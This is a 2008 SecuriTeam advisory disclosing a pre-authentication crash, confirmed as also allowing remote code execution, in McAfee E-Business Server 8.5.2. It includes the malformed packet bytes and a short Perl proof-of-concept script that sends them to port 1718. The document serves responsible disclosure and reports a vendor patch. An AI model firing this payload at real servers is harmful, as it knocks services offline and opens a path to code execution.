[NEWS] McAfee E-Business Server Preauth Code DoS
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 10 Jan 2008 13:25:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
McAfee E-Business Server Preauth Code DoS
McAfee E-Business Server "guards sensitive corporate data with
industry-standard PGP 128-bit encryption and authentication. McAfee
E-Business Server supports a variety of platforms and security
certificates". It possible to crash McAffe's E-Business Server by sending
it a malicious packet to its TCP port 1718.
* McAfee E-Business Server version 8.5.2
It is possible to crash McAfee E-Business Server during the authentication
process. When a malformed (oversized) initial authentication packet is
sent to E-Business Server, the server will crash, and will have to be
A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953
McAfee further researched the vulnerability and confirmed that it allows
an attacker to also remotely execute code.
The vendor has addressed this vulnerability with E-Business server patch
update on January 8th, 2008.
Vendor advisory and update link:
<https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=614472> https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472& sliceId=SAL_Public&command=show& forward=nonthreadedKC&kcId=614472
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) -
# - tested on Windows and Linux
# Leon Juranic <leon.juranic@xxxxxxxxx>,
# Infigo IS <http://www.infigo.hr/en/>
$saddr = "192.168.1.3";
$sport = 1718;
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort =>
$sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;
The information has been provided by <mailto:leon.juranic@xxxxxxxxx> Leon
The original article can be found at:
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [TOOL] PortBunny - Linux-kernel-based Port Scanner
- Next by Date: [NT] Sun J2RE DoS Issue (RFC2397)
- Previous by thread: [TOOL] PortBunny - Linux-kernel-based Port Scanner
- Next by thread: [NT] Sun J2RE DoS Issue (RFC2397)